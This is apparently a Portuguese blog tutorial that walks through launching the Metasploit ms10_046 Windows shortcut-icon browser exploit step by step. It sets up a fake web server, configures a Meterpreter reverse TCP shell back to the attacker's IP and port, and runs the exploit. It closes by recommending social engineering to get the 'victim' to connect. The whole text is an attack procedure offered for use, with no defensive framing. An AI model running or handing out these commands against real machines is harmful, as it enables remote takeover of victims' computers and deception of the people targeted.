# ./msfconsole
O primeiro comando seleciona o exploit que será usado:
> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Caso queiramos mais informações sobre o exploit e sua respectiva falha, podemos digitar o seguinte comando:
> info
Esse comando exibirá, além da informações sobre a falha, as opções que precisamos configurar para o correto funcionamento do exploit. As opções obrigatórias são: SRVHOST, SRVPORT
Vamos configurá-las:
> set SRVHOST 192.168.0.83
Esse último comando, permitirá configurarmos o IP no qual o servidor web falso será montado para que a vítima acesso-o. No comando abaixo, vamos configurar a porta na qual o servidor ficará escutando, à espera de uma conexão:
> set SRVPORT 80
Havendo configurado a parte básica do exploit, precisamos configurar o que ele fará após explorar a falha no navegador da vítima, isso é, o payload:
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.0.83
> set LPORT 4444
Tudo configurado, funcionando bem, sem nenhum erro, simplesmente lançamos o exploit e aguardamos a vítima conectar em nosso servidor falso:
> exploit
Para conseguirmos que a vítima conecte, nada como um bom e velho ataque de engenharia social :-)
Nenhum comentário:
Postar um comentário